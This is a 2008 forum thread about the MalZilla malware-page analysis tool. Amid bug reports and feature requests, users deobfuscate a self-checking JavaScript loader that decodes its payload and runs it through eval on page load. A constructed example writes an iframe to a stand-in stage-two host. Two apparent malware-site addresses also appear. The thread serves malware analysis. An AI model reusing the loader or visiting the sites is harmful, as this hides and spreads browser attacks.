Malware Domain List

Malware Related => Tools of the trade / Internet News => Topic started by: JohnC on August 19, 2007, 01:06:20 pm

Title: MalZilla
Post by: JohnC on August 19, 2007, 01:06:20 pm
Web pages that contain exploits often use a series of redirects and obfuscated code to make it more difficult for somebody to follow. MalZilla is a useful program for use in exploring malicious pages. It allows you to choose your own user agent and referrer, and has the ability to use proxies. It shows you the full source of webpages and all the HTTP headers. It gives you various decoders to try and deobfuscate JavaScript as well.

It was previously released only as a private beta, but has now moved to a public beta stage. You can download MalZilla at the MalZilla sourceforge page here (http://malzilla.sourceforge.net/).

There is a guide for using MalZilla made available here http://malzilla.sourceforge.net/tutorial_01/index.html
Title: Re: MalZilla
Post by: bobby on October 09, 2007, 08:27:09 pm
Malzilla updated to 0.9.2
Also a new tutorial in Documents section.

http://malzilla.sourceforge.net/
Title: Re: MalZilla
Post by: bobby on October 10, 2007, 08:28:54 pm
I apologize, 0.9.2 was a broken release :(
Fixed and uploaded as 0.9.2.1
The download mirrors will be updated (hopefully) in one hour.
Title: Re: MalZilla
Post by: bobby on January 20, 2008, 04:05:31 pm
Anyone willing to translate Malzilla to other languages?

I'm preparing next release, and I would like to include a couple of translations with the release.

There are some 200 strings to translate. Unicode is supported, so one can even translate to Chinese or Arabic.
Translation tool is also available.

I'm still polishing the interface, so the string list is still not complete, but if anyone applies for translating, I would prepare the list in ~10 days.
Title: Re: MalZilla
Post by: sowhat-x on January 21, 2008, 04:03:37 am
I'll try my best to get an exact translation for Greek,
whenever you think the strings' list is ready, pass it over...  :)
Title: Re: MalZilla
Post by: bobby on February 10, 2008, 01:25:59 am
I apologize for late reply.
I have uploaded a 0.9.3 pre-release on http://malzilla.sourceforge.net/

Please try to play a bit with translation, and tell me if buttons/labels are big enough for the translated text to fit in.
If not, I would need to play a bit with buttons size or with font size.

Translator folder contains a basic translating tool. It is still not polished, as it shows the resource numbers, but I've coded it today and didn't have time to make it better.
The uploaded default.lng is also done in hurry, it does not contain the messages and dialogs, but it is good enough to test the interface/GUI translation.
Title: Re: MalZilla
Post by: tjs on February 12, 2008, 10:35:23 pm
Thanks, Bobby!

Do you prefer if we post bugs & suggestions here or on the sourceforge forum? I've already found a few in 0.9.3pre.

TJS
Title: Re: MalZilla
Post by: bobby on February 13, 2008, 04:44:40 am
Quote
Thanks, Bobby!

Do you prefer if we post bugs & suggestions here or on the sourceforge forum? I've already found a few in 0.9.3pre.

TJS
Hi TJS,

I check both forums every day, so both are equally good for posting bugs & suggestions.

regards
bobby
Title: Re: MalZilla
Post by: jimmyleo on February 13, 2008, 06:21:37 am
chinese_simply language ready! ;D
mailed to u, bobby~
Title: Re: MalZilla
Post by: sowhat-x on February 13, 2008, 06:35:57 am
Lol, jimmyleo... was it that easy doing it under Chinese? What's your secret?  :)
Damn it... 'cause I've run into quite a bit of trouble doing this for Greek,
not only couldn't I find the equivalent technical terms,
but the resulting boxes should be huge afterwards... I'll see what can be done...  :-\
Title: Re: MalZilla
Post by: jimmyleo on February 13, 2008, 07:29:28 am
hi sowhat-x,
I only couldn't find the "find" resource ID in the "decoder" tab...
and some of them should be wider for better presentation.
I translated most of them, and only a little hasn't been translated, because they are reserved in Chinese.
and some of the technical names which I know, maybe from my FreShow experience :P
Title: Re: MalZilla
Post by: tjs on February 14, 2008, 05:41:21 pm
Hello Bobby,

Here are some issues and suggestions inspired by your latest pre-release of malzilla.

Update version number not in sync (reads 0.921 instead of 0.9.2.1)
Clipboard doesn't work properly (on Vista)
  - functional but throws an error
  - locks clipboard in other apps [this is annoying]
  - Suggestion: clipboard feature disabled by default
Regression from previous version: URL no longer opens without http or www
  - Suggestion: add support for hxxp, default to http for protocol and support non www.* links (ex. blah.com)
Suggestion: Option to enable/disable highlighting
Suggestion: Option to hide/show comments (<!-- -->) [some obfuscation puts them everywhere]
Hex view under download tab is a great idea -- what's the point of the 'hex view' tab?

Thank you very much for your hard work on this great utility!
tjs
Title: Re: MalZilla
Post by: bobby on February 14, 2008, 07:08:47 pm
@jimmyleo
This pre-release was just a test to see how the translating engine is working. There are more strings missing in that default.lng file.
I will release a complete list at the moment we know which features will get into 0.9.3 release.

@TJS,

About the minor issues:

====
- version number does not matter at the moment as long as you know if you have the newest version. You see, there is a HTML file on the Malzilla's site that contains a string with the current version number. I can convert a string to float, and compare it with a number stored as a variable in Malzilla. That's how it is done, and that's why the version is stored as 0.921 (float, floating point number).
If I would like to report it in the form of 0.9.2.1 I would need to write a parser and extra code for comparing these version numbers. I'll keep it simple for now.

====
- about URLs and annoying messages - I did try to prevent the user from entering FTP or HTTPS URLs, as Malzilla gets stuck for a long time if one is entered. Malzilla does not support these protocols, nor will it.
I'll code it in a different way, as it is really annoying as it is.

===
- Enable/Disable Highlighters - will be done. If I get enough time I'll also make them configurable (select colors the way you like).

====
- Hex View under Download tab is just an experiment. I wanted to see how useful/useless it can be. Let both Hex Views stay where they are, and we will see in the next release which one is for the TrashCan.



About the major issues:

====
- Clipboard monitor is really a pain. It is useful if you copy a long list from some forum/site, but it is a pain as it also gets triggered at internal copy/paste in Malzilla.
Also, there is some bug (not in my code, maybe Delphi or Windows) that triggers the Clipboard Monitor twice for each URL on the clipboard. That's why it clears the clipboard after a URL is detected and pasted to the list.
Hmmm... I was thinking that I solved that locking of the Clipboard for other applications (in fact - clearing the clipboard, not really locking).
I will get back to this Clipboard Monitor later, I have some more important things to do first.
Can you give me some info on which error it triggers on Vista? I do not have Vista, all is done on XP (a half-working Linux version is also there)

====
- Hide comments - this one will need some coding. See my list of priorities (follows in this post).



ToDo list:

====
Lately I see a lot of scripts using arguments.callee().toString in a way which obviously gives very funny results in Malzilla.
(I guess all of you already know this, but...) arguments.callee().toString differs between SpiderMonkey (Mozilla, FireFox, Malzilla...) and Internet Explorer.
As I see, a lot of scripts I'm seeing lately are using this in a way that makes the script "IE-only".
I already know what to try, I just need some time to test my idea.

====
History/Log/Case - no, those are not 3 options needed, it is just one feature. I received a request for keeping track of what was done and how, and for grouping things in something like a Project/Case.
Guess I'll do it in the form of a button "Start/stop logging", where every action will be recorded (URLs, HTML content, decoded content etc. etc.). I think this would be a very useful feature.

====
More Download tabs (something like tabbed browsing in FireFox). Well, it sounds complicated to me to have unlimited number of tabs (a looooot of coding needed, and there is a danger of memory leaks), so I'm thinking about having some 5 (or say 10) Download tabs that the user can open.



btw. did someone already see the debugger? :) (just type some nonsense in Decode tab, and try to run the script)
It wasn't intended to be there in this pre-release, but I forgot to disable it before doing the upload.
Unfortunately, you got a half-baked debugger, as some options were disabled.

This debugger is not my code, it is part of the wrapper I use to access SpiderMonkey, but it seems that nobody from the team who published the wrapper knows how to use/access this debugger from the program code (I asked on the mailing list), so I'm on my own here.
Title: Re: MalZilla
Post by: tjs on February 14, 2008, 08:08:14 pm
I just did some testing on XP and noticed that the clipboard issue occurs here too. When I click 'send script to decoder' in the text tab, I occasionally get an error from malzilla saying it cannot open the clipboard. On vista, I get this error when I start the application sometimes as well.

As for the debugger, I like it, but I think it should be integrated as another tab instead of a popup... Especially because it's not always useful (particularly when you have multiple nested obfuscated scripts). In many cases it throws errors about 2nd degree script variables not being defined, even though the obfuscation is properly decoded in the decode tab. I'd rather not have to close the debugger every time I run a script.

Maybe you can make the debugger configurable (whether to use it or not)...

Also, a random point, I HIGHLY recommend that you set 'clear cache on exit' as default. The cache is usually full of malware and AV scanners hate it.

TJS
Title: Re: MalZilla
Post by: bobby on February 14, 2008, 08:52:13 pm
@tjs
I just changed the code for Send script to decoder. It does not use Clipboard anymore.
About errors with Clipboard, I didn't have any of them here, so I have no idea what's wrong. Maybe it is a conflict with some software you use on both XP and Vista.

As for debugger - it is external code, programmed in such a way that it can't be so easily transformed into another tab.
Only thing I can do is a checkbox 'debug', where you can choose to use the debugger or not, or a separate button for debugging.

As for Clear cache on exit - I can do it if you prefer so. I prefer not to clear the Cache, and I do not run any AV on this PC (with some 50GB of malware on my HDD, AV would go crazy).
Title: Re: MalZilla
Post by: tjs on February 15, 2008, 01:55:06 am
Debugger:
I like the idea of a separate button or control to decide whether or not to use the debugger.

Cache:
I understand your point. I also don't run any AV scanners on the machines that I do analysis on. I just don't see the value of persisting the cache between sessions. It's not like the performance tradeoff is that valuable anyway (I don't mind if you have to redownload pages every time- after all, we're looking for malware, not browsing the web).

Clipboard:
I'll investigate further, but i'm not really running anything unusual on either of my analysis machines. Maybe I'm infected with something that is hooking the clipboard ;)

TJS
Title: Re: MalZilla
Post by: jimmyleo on February 15, 2008, 02:50:02 am
No problem. When the full-string is ready, just mention me.

and about the Clipboard Monitor problem. I've come across it sometimes under Vista. Just as I click "send to decoder", it pops up "can't open clipboard".

debugger is a bonus originally.  ::) I found it in one analysis condition.

I also recommend that the clipboard feature be disabled by default, because when I use other tools it made me confused.

best regards,
jimmyleo
Title: Re: MalZilla
Post by: tjs on February 15, 2008, 06:44:31 pm
I'm running into a new issue with 0.9.2.1pre

I constantly paste URLs without www or http by mistake (usually IP based) causing Malzilla to throw the malformed URL msgbox, but today while trying the following IP, I got a new error:

(X) Access violation at address 004eba13 in module malzilla.exe. Read of address 00000000

Can anyone else repro this bug?
208.72.168.176/e-Z1odey0312/index.php

Thanks,
TJS
Title: Re: MalZilla
Post by: bobby on February 15, 2008, 07:22:02 pm
Was there anything on that address at the time you tried it, or was it a 404 error page?

If there was some content, can you please upload it for me to test it?

I did have some Read of address 00000000 errors while trying to integrate the debugger.
All the errors were related to the package I use for dealing with Unicode strings:
http://mh-nexus.de/tntunicodecontrols.htm
so, not really my fault, but I can at least do something to prevent the Malzilla's crash if I can localize the error you got.
Title: Re: MalZilla
Post by: sowhat-x on February 16, 2008, 08:42:09 am
...only 1 request here... what jimmyleo already said about clipboard monitor being disabled by default:
copy/pasting http addresses in the 'URL' box has caused me quite a bit of trouble on occasion,
i think it happens sometimes when an address is already filled there,
and someone tries to copy/paste a partial address there (without the http prefix),
not sure, I'll have to dig a bit more to check exactly when this happens (under v0.921)  :(
And the clipboard monitor feature in 0.93 beta makes it quite a bit more confusing...  :P
Title: Re: MalZilla
Post by: bobby on February 16, 2008, 08:58:03 am
http://rapidshare.com/files/92273310/malzilla.zip.html

Please test the changes I made.
I will drop Clipboard Monitor in the future. I'll try to replace its functionality in some other way.
Title: Re: MalZilla
Post by: sowhat-x on February 16, 2008, 09:10:26 am
Ha-ha -> less than 16 minutes...this must be the fastest bugfix response I've ever seen!  ;D
Yeap, at least under a first quick glance, copy/pasting urls in this build
seems to be working in a much better and simpler way...  ::) :)
Title: Re: MalZilla
Post by: bobby on February 17, 2008, 08:59:26 am
Grrrr....
Take a look at the script in the attachment (pass= infected).

It is a modified Caesar cipher, that means trivial, but...
The decryption key is created on the fly, and it depends on the function length (arguments.callee thing).

The function is full with redundant operations and variables (used nowhere), just to make the analyst mad.

That is the kind of script I mentioned a couple of posts ago:
Quote
ToDo list:

====
Lately I see a lot of scripts using arguments.callee().toString in a way which obviously gives very funny results in Malzilla.
(I guess all of you already know this, but...) arguments.callee().toString differs between SpiderMonkey (Mozilla, FireFox, Malzilla...) and Internet Explorer.
As I see, a lot of scripts I'm seeing lately are using this in a way that makes the script "IE-only".
I already know what to try, I just need some time to test my idea.

Can someone help in deciphering this?
I would like to include decoding for such scripts in Malzilla.

If anyone is interested, I would like to share my findings.
Last night I tried to write a PScript for brute-forcing it, but PScript misses a lot of functions I need for this.
If I get some time today, I'll try to code one brute-forcer for this (EXE, not script).
Title: Re: MalZilla
Post by: Drusepth on February 18, 2008, 05:10:54 am
I'm working on analyzing the script right now (finally, something I might know how to do! :)), but I just wanted to point out if you just wanted to find out what it is that the function is running, you can take a glimpse at the very end:
Code: [Select]
eval(h8TbWsRTn);}
It's going to run whatever is in the h8TbWsRTn variable (this is after it's been decrypted).  Instead, we can modify the code to just print it out to the screen:
Code: [Select]
document.write(h8TbWsRTn);}
But, this doesn't come out clean:
Quote from: Output
elkMvmrlCc_Sn;fri%QJp[LR:G.+y_q^0f7f36<`'cvjsl\k^u2f_kcbO0xrQsifXi,,,q\mVcgh&.STi0*%(%qYWtscq:^]g,,9uXo s5:a0GM2S?y_qA!m67KtNC%xeuf[4]89|3n4^0f7f36<`niqes_8`cv#_d-U"wf{K:m^\"qYOQak.vx@%&2sKt${06je,7Lj;m\t Cvu_x&%hsu&C.h6QxUE4-%F;n03DrAH@5352A!m67KtNC--{06je,7LjYC.h6QxUET:=zdph.!e5SNGH:=jrp';4U48PsV=:4<>B6b/OyZD:;4U48PsV=;(?5,zh.!e5SNGH:s5:a0GM2SBA<0 [*u45b(M:JU)/(60#:<571*5<4,9efokPJj4HLOYA39hCDV7URcV3/8?lJFc2;QiZ)<;4U48PsV='+$~v1.pRD9KeZ`I1n9TMdN(.9o52LlT0_A+v1.pRD9KeZ`I1n9TMdNZHs5:a0GM2S->ge%b4;vfA,EQ]mOEk,N9g[.B6b/OyZD\9 2-#yw)4]jF8FfRf6Ip8ON\TF;n03DrAHa.;3)6;::08-8gdc5O5_d|P;3)6;::08,8Pqv+o0.`RTKO<'8[3;f/OGE;>kg5r-2c7s>o0.`RTKO*"&eci9V7l_bOA{06je,7LjY'Xb Z\te|&(2sKt$jb6j3{9r;`\3B:yevL%iOpkwf:]l\*H:i1+J_YJ@.:;4U48PsV=9"=H:i1+J_YJ.)(x`cv#Fb(-G|56<^a!u:8w4f(.9o52LlT0=jwS1ZtLT^B6b/OyZD\4.%hxX0bn14R_G5j)17w[I[<'8`cv#BAD@O2X53:m^\"LpOAX_Ns:>t`i;zLPaw_0=kg5r-2c7s@eGcU8UGMB-cbXixk9PoE7e|k114dN9w93x,l%XTvR3>4=nA4/1*8@RwW2F.PV?U{FLZuR56>dni%.9o52LlT0?4>B6b/OyZD;^a!u:8w4f8.9o52LlT0-A5'zm^\"{\1G[cAyk@eGcU8UGMB-jrLuxu&C.h6QxUE#/=HEKB\->49@n`ipOKrw&vP02fjZuf#. +?KkP9^Lfu9;C9J-g4W04$c^:EDo2FeEQWoMG+2X:a>geEWSFd`ch3&2-#yGdN,cfgo54EWSFd`ch34999|dS;TnqBsk('Uxugm^+PtspAgXo-qhh&GdN,cfgo5 8;zLPaw_0-/>TOjQI;Vj<*5#3?ld'FPVQL73m/9Pv4=nA4.8)8PvY5av+G:]H:i1+J_YJ`;1'8g"ioqdx9UpRF3,k"?4>TOjQI;Vj<;4U48PsV=8giy_kj@SVmlCkq= JelNT:lvp'0P6G7_`/6KC882A04P;4E56/30;i<35*3086d3@(6Mc;d/@/^d:9D8,>,;;<3A.6!:;db8.> ;;D0a.2K88e28,>,;fD2a.28F:a2]15j6C3Z^":j;d@/408<75,2O86916:6Kc<<38-6D8d_`)>.788B6\0P6G7_@/5 :4D?703"ciD05'>-;;d67+> D:e1896,c;d6`/2+88e2@+6-789.5*2:5e35=3,89976.39;:15048F8?A,3P9::05/3K8;9?683#9;:34/^8j936-3K9::5593#8F9A6,2"d4:c5,3/899B6.3 99:25.20;<6aZ3C7e/@)6Oc4<67-6+cfDB8-3c<;/8(>":<:58<6K7F9D4'0M)->

So right now I'm looking at the code to see how it is actually working.  It'll take a tiny bit longer than normal, since I have to look up certain syntaxes for things that the writer used that are ridiculous ("variable2 = (variable2>>>1)^((variable2 & 1) ? 3988292384 : 0);") and I still don't fully understand how the deprecated .callee function works.

Anyway, first I'm just cleaning up the code.  I'm posting each step in case I make a mistake, someone else can catch it and carry on their own work from there or something.

Step 1: Get syntax back and make it look "clean" (indentation, spaces, etc)
Code: [Select]
<html>
<script language="JavaScript">
<!--
function nlR1sYAdQ (dp58428V3) {
    // Key material: the function's own source text, stripped of non-word characters and upper-cased
    var m6K3yhq2K = arguments.callee.toString().replace(/\W/g, '').toUpperCase();
    var A7ck1Wh8H;
    var B2t331TL0;
    var NisOkeH61 = m6K3yhq2K.length;
    var Xn47RT3Sm;
    var h8TbWsRTn = '';
    // Build a 256-entry CRC-32 lookup table (3988292384 = 0xEDB88320, the reversed CRC-32 polynomial)
    var PkKX3bWF0 = new Array();
    for (B2t331TL0 = 0; B2t331TL0 < 256; B2t331TL0++) {
        PkKX3bWF0[B2t331TL0] = 0;
    }
    var A7ck1Wh8H = 1;
    for (B2t331TL0 = 128; B2t331TL0; B2t331TL0 >>= 1) {
        A7ck1Wh8H = (A7ck1Wh8H >>> 1) ^ ((A7ck1Wh8H & 1) ? 3988292384 : 0);
        for (i5G3CC1F6 = 0; i5G3CC1F6 < 256; i5G3CC1F6 += (B2t331TL0 * 2)) {
            PkKX3bWF0[i5G3CC1F6 + B2t331TL0] = (PkKX3bWF0[i5G3CC1F6] ^ A7ck1Wh8H);
            if (PkKX3bWF0[i5G3CC1F6 + B2t331TL0] < 0) {
                PkKX3bWF0[i5G3CC1F6 + B2t331TL0] += 4294967296;
            }
        }
    }
    // CRC-32 of the function source: any edit inside the function changes this value
    Xn47RT3Sm = 4294967295;
    for (A7ck1Wh8H = 0; A7ck1Wh8H < NisOkeH61; A7ck1Wh8H++) {
        Xn47RT3Sm = PkKX3bWF0[(Xn47RT3Sm ^ m6K3yhq2K.charCodeAt(A7ck1Wh8H)) & 255] ^ ((Xn47RT3Sm >> 8) & 16777215);
    }
    var eXK5vvK0K = new Array();   // eXK5vvK0K and Y37iVA85C are written but never read: decoys
    var Y37iVA85C = 2323;
    Xn47RT3Sm = Xn47RT3Sm ^ 4294967295;
    if (Xn47RT3Sm < 0) {
        Xn47RT3Sm += 4294967296;
    }
    Xn47RT3Sm = Xn47RT3Sm.toString(16).toUpperCase();
    // The 8-byte key: char codes of the CRC's hex digits, left-padded with '0' (char code 48)
    var sNImKPP0N = new Array();
    var NisOkeH61 = Xn47RT3Sm.length;
    for (B2t331TL0 = 0; B2t331TL0 < 8; B2t331TL0++) {
        var LS0E1DrB3 = NisOkeH61 + B2t331TL0;
        eXK5vvK0K[B2t331TL0] = 1;
        eXK5vvK0K[B2t331TL0] = Y37iVA85C;
        if (LS0E1DrB3 >= 8) {
            LS0E1DrB3 = LS0E1DrB3 - 8;
            sNImKPP0N[B2t331TL0] = Xn47RT3Sm.charCodeAt(LS0E1DrB3);
        } else {
            sNImKPP0N[B2t331TL0] = 48;
        }
    }
    // Payload: hex byte pairs, each offset by one key byte (key index vM4s1CVcM cycles 0..7)
    var vM4s1CVcM = 0;
    var ahE3xpv6w;
    var L3KsBg108;
    var v65y6Hs6a;
    NisOkeH61 = dp58428V3.length;
    v65y6Hs6a = NisOkeH61;
    Y37iVA85C = 1123;
    Y37iVA85C = v65y6Hs6a;
    for (B2t331TL0 = 0; B2t331TL0 < NisOkeH61; B2t331TL0 += 2) {
        var QgQRdYhu8 = dp58428V3.substr(B2t331TL0, 2);
        ahE3xpv6w = parseInt(QgQRdYhu8, 16);
        L3KsBg108 = ahE3xpv6w - sNImKPP0N[vM4s1CVcM];
        if (L3KsBg108 < 0) {
            L3KsBg108 = L3KsBg108 + 256;
        }
        h8TbWsRTn += String.fromCharCode(L3KsBg108);
        v65y6Hs6a++;
        Y37iVA85C = 3891;
        if (vM4s1CVcM < sNImKPP0N.length - 1) {
            vM4s1CVcM++;
            Y37iVA85C = 1092;
            eXK5vvK0K[B2t331TL0] = 20;
        } else {
            vM4s1CVcM = 0;
            Y37iVA85C = B2t331TL0;
        }
    }
    // Run the decoded text
    eval(h8TbWsRTn);
}
//-->
</script>
<body onLoad="nlR1sYAdQ('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')">

</body>
</html>

Step 2: Replace variable names with normal ones, and remove obvious redundancy
Code: [Select]
<html>
<script language="JavaScript">
<!--
function thefunction (parameter) {
    var variable1 = arguments.callee.toString().replace(/\W/g, '').toUpperCase();
    var i, j; // Used in for loops
    var variable4 = variable1.length; // .lengths of various vars
    var variable6 = '';
    var array1 = new Array(); // CRC-32 lookup table
    for (i = 0; i < 256; i++) {
        array1[i] = 0;
    }
    var variable2 = 1;
    for (i = 128; i; i >>= 1) {
        variable2 = (variable2 >>> 1) ^ ((variable2 & 1) ? 3988292384 : 0);
        for (j = 0; j < 256; j += (i * 2)) {
            array1[j + i] = (array1[j] ^ variable2);
            if (array1[j + i] < 0) {
                array1[j + i] += 4294967296;
            }
        }
    }
    var variable5 = 4294967295; // CRC-32 of the function's own source
    for (variable2 = 0; variable2 < variable4; variable2++) {
        variable5 = array1[(variable5 ^ variable1.charCodeAt(variable2)) & 255] ^ ((variable5 >> 8) & 16777215);
    }
    var array2 = new Array(); // written but never read
    variable5 = variable5 ^ 4294967295;
    if (variable5 < 0) {
        variable5 += 4294967296;
    }
    variable5 = variable5.toString(16).toUpperCase();
    var array3 = new Array(); // the 8-byte key: CRC hex digits, left-padded with '0'
    var variable4 = variable5.length;
    for (i = 0; i < 8; i++) {
        var variable7 = variable4 + i;
        array2[i] = 1;
        array2[i] = '';
        if (variable7 >= 8) {
            variable7 = variable7 - 8;
            array3[i] = variable5.charCodeAt(variable7);
        } else {
            array3[i] = 48;
        }
    }

    var variable8 = 0; // key index, cycles 0..7
    var variable10;
    variable4 = parameter.length;
    var variable13 = 3891;
    var variable11 = variable4;
    for (i = 0; i < variable4; i += 2) {
        var variable12 = parameter.substr(i, 2);
        variable10 = parseInt(variable12, 16);
        variable10 = variable10 - array3[variable8]; // subtract the key byte (Step 1: L3KsBg108 = ahE3xpv6w - sNImKPP0N[vM4s1CVcM])
        if (variable10 < 0) {
            variable10 = variable10 + 256;
        }
        variable6 += String.fromCharCode(variable10);
        variable11++;
        if (variable8 < array3.length - 1) {
            variable8++;
            variable13 = 1092;
            array2[i] = 20;
        } else {
            variable8 = 0;
            variable13 = i;
        }
    }
    eval(variable6);
}
//-->
</script>
<body onLoad="thefunction('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')">

</body>
</html>

And now is where the drudgework of tracing each variable as it's thrown around comes in...  I think I'll save it for the morning or tomorrow. 

A few things I would like to point about prerequisites for the string passed to the javascript function:
- It needs to be a longer string.  "hellohellohellohello" works, when "hello" returns nothing.  ("hellohe" was the shortest I could get it)
- As far as I could tell, it can have newlines being passed to it.
- The line "variable10 = variable10 + 256;" is bringing characters being made up above 256, no matter what.  AKA it's up to unicode
http://unicode.org/charts/
Title: Re: MalZilla
Post by: jimmyleo on February 18, 2008, 08:34:49 am
hello bobby

I've come across this issue many times recently.
I and my friend dikex found a way to decode it in the script way we used to do.

because it calls itself, we throw it into a variable without changing. eg. var a="....";
and replace "arguments.callee" with the variable.
and we can do what we want to do. eg. replace eval() with the ... method.

have fun!

best regards,
jimmyleo
Title: Re: MalZilla
Post by: bobby on February 18, 2008, 04:17:57 pm
Hi Drusepth, hi jimmyleo,

You can't make any single change in the script because it does not check only the length of the function, but it checks every single character:
Code: [Select]
for(A7ck1Wh8H = 0; A7ck1Wh8H < NisOkeH61; A7ck1Wh8H++) {
Xn47RT3Sm = PkKX3bWF0[(Xn47RT3Sm^m6K3yhq2K.charCodeAt(A7ck1Wh8H))&255]^((Xn47RT3Sm>>8)&16777215);
}
So, if Xn47RT3Sm does not have the expected value at the end of the loop, it means something is changed in the script, and the decoding will not succeed. Only with the proper value of this variable will the data decode like it should.

So, I have asked on another board for advice, and I was told to use the oldest trick in decoding - override the eval() function.
JavaScript allows re-defining every internal function, so just add this line at the beginning of the script:
Code: [Select]
function eval(a) {document.write(a)};
This is a re-definition of the eval() function, so eval will in fact call document.write.

This is the only working method for this kind of scripts.

If you use this on other script, just be sure that the script does not do another overriding of eval() (or of any other internal function), after your overriding.

best regards
bobby
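Added example (not code from the thread or from MalZilla) tying bobby's eval() override to the script Drusepth cleaned up in Step 1 and Step 2 above: a constructed decoder whose key is the CRC-32 of its own text, taken through arguments.callee.toString() with non-word characters stripped, with the payload stored as hex byte pairs offset by the key's hex-digit char codes, run once with the override line placed in front of the script and once with eval() edited inside the function. The names dec, crc32Hex, keyFor, encode, runWithEvalOverride, runWithEditedFunction and the payload string are my own.

```javascript
// Constructed self-checking decoder in the style of the script discussed above.
// Any edit inside this function changes its source text, so the CRC-32 and
// therefore the key no longer match what the author encoded with.
const SAMPLE_DECODER = `
function dec(hex) {
  var src = arguments.callee.toString().replace(/\\W/g, '').toUpperCase();
  var crc = 4294967295;
  for (var i = 0; i < src.length; i++) {
    crc = crc ^ src.charCodeAt(i);
    for (var k = 0; k < 8; k++) crc = (crc >>> 1) ^ ((crc & 1) ? 3988292384 : 0);
  }
  var key = ((crc ^ 4294967295) >>> 0).toString(16).toUpperCase();
  var out = '';
  for (var j = 0; j < hex.length; j += 2) {
    var b = parseInt(hex.substr(j, 2), 16) - key.charCodeAt((j / 2) % key.length);
    if (b < 0) b += 256;
    out += String.fromCharCode(b);
  }
  eval(out);
}`;

// Same CRC-32 (bitwise, no table) that the sample computes over its own source.
function crc32Hex(text) {
  let crc = 0xFFFFFFFF;
  for (let i = 0; i < text.length; i++) {
    crc ^= text.charCodeAt(i);
    for (let k = 0; k < 8; k++) crc = (crc >>> 1) ^ ((crc & 1) ? 0xEDB88320 : 0);
  }
  return ((crc ^ 0xFFFFFFFF) >>> 0).toString(16).toUpperCase();
}

// Key the sample will derive at run time: whitespace and punctuation are
// stripped first, so only the tokens of the function text matter.
function keyFor(fnSource) {
  return crc32Hex(fnSource.replace(/\W/g, '').toUpperCase());
}

// Encoder matching the sample's decoder (what the script's author ran once).
function encode(plain, key) {
  let hex = '';
  for (let i = 0; i < plain.length; i++) {
    const b = (plain.charCodeAt(i) + key.charCodeAt(i % key.length)) & 255;
    hex += (b < 16 ? '0' : '') + b.toString(16);
  }
  return hex;
}

// Bobby's approach: put `function eval(a) {...}` in front of the script and
// leave the decoder's own text untouched, so its self-check still yields the
// right key. A Function() body is sloppy-mode code, where `eval` is an
// ordinary name that can be rebound (a SyntaxError in strict mode).
const EVAL_OVERRIDE = 'function eval(a) { captured.push(a); }\n';

function runWithEvalOverride(scriptSrc, call) {
  const captured = [];
  new Function('captured', EVAL_OVERRIDE + scriptSrc + '\n' + call)(captured);
  return captured;
}

// The tempting alternative: swap eval(out) for a print inside the function.
// That changes arguments.callee.toString(), so the derived key is wrong.
function runWithEditedFunction(scriptSrc, call) {
  const captured = [];
  const edited = scriptSrc.replace('eval(out);', 'captured.push(out);');
  new Function('captured', edited + '\n' + call)(captured);
  return captured;
}

// Constructed stand-in for the decoded stage; it is captured, never executed.
const PAYLOAD = "document.write('<iframe src=http://example.invalid/stage2>')";

function demo() {
  const call = "dec('" + encode(PAYLOAD, keyFor(SAMPLE_DECODER)) + "');";
  return {
    viaOverride: runWithEvalOverride(SAMPLE_DECODER, call)[0],
    viaEdit: runWithEditedFunction(SAMPLE_DECODER, call)[0],
  };
}

console.log(demo());
```

Only viaOverride comes back as the original payload; viaEdit is the same kind of garbage Drusepth got from document.write inside the function.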
Title: Re: MalZilla
Post by: jimmyleo on February 19, 2008, 07:42:54 am
Quote
because it does not check only the length of the function, but it check every single character:

oh ,bobby:
You may not have looked at my reply carefully. :P
Quote
so we throw it into a variable without changing
Title: Re: MalZilla
Post by: bobby on February 19, 2008, 07:11:12 pm
@jimmyleo

Sorry, but I do not understand, even if I read your post a couple of times.
Can you give an example where you can show what exactly you are doing with arguments.callee?
Title: Re: MalZilla
Post by: jimmyleo on February 20, 2008, 02:24:15 am
it may help you.

you can do it step by step until the result is revealed.

regards,
jimmyleo
Title: Re: MalZilla
Post by: tjs on February 25, 2008, 12:01:39 pm
I have a bug and feature suggestion related to the 'send to decoder' feature:

* send script to decoder breaks when a script src is closed.. ex:
   <script src="poked.js" language="JavaScript"></script>
   malzilla thinks the script starts after </script> till EOF

* send script to decoder can be improved on pages with multiple <script>
   <script>foo;</script><script>bar;</script>
   it would be nice to have a feature to send ALL scripts to decoder

Example malware site exploiting both of these limitations:
hxxp://pokerfinds.com

Thanks,
TJS

Title: Re: MalZilla
Post by: bobby on February 25, 2008, 04:23:13 pm
@TJS
Many thanks for locating this bug.
I did see it a couple of times, but I didn't locate what's producing the bug.

About the sending all the scripts (or should I better say - all the relevant data) - it is not so trivial.
There is a lot of scripts which are using multiple begin and end tags (like in your example), but I also saw a lot of scripts where a part of malicious code is in HTML part:

<html>
<script>function decode_and_run(a){....}</script>
<body
 onLoad="decode_and_run('AF123400AA (encrypted data/code) ...')"></body></html>

See, I would need to build some heuristics that can decide if some of the normal HTML events are also relevant, and I do not know how to do that (in fact, I have an idea, but I do not think that I'll ever have enough time to code it, just like I do not have time for my other ideas like using Malzilla as a scanner that would have signatures of various exploits, or adding more standard DOM objects and functions etc.)

If it would be OK just to have some kind of "Append to Decoder" button (as addition to Send to Decoder), that will be done in 5 minutes.

@jimmyleo
Unfortunately, I didn't succeed in getting any results from the files you uploaded.
Do you use IE to run these or are you using any SpiderMonkey-based app (FireFox, Malzilla...)?
Title: Re: MalZilla
Post by: bobby on February 25, 2008, 04:57:42 pm
Finding script start and end points fixed for the given case.

What to do with multiple script tags, Append or Send All?
Title: Re: MalZilla
Post by: tjs on February 25, 2008, 06:20:45 pm
Append could get messy if you start doing cross-domain stuff (I don't want to manually have to clear decoder every time I work on a different site), so maybe a new button to send all to decoder is a good idea. But append is also a good idea because I'm sure there will be cases where your users don't want to send *all* scripts on a page to the decoder....

 ???

Has anyone else run into this issue? Does anyone have an opinion here?
Title: Re: MalZilla
Post by: bobby on February 25, 2008, 06:45:35 pm
You won't need to clear decoder anymore in the near future.
Development version on my PC has tabbed interface (multiple tabs for Download and Decoder)
I will upload it as soon as we get (re)solved the emerging bugs/suggestions.
Title: Re: MalZilla
Post by: jimmyleo on February 26, 2008, 12:55:30 am
Re bobby:
I'm truly sorry for my lack of explanation.
I used IE to execute this script.
and you can see a following Caesar decoding.
and you can do the same to it.

regards,
jimi.
Title: Re: MalZilla
Post by: tjs on February 26, 2008, 05:48:42 am
I'm very excited about the tabs feature. :)
Title: Re: MalZilla
Post by: sowhat-x on February 26, 2008, 04:49:25 pm
Quote
...just like I do not have time for my other ideas,
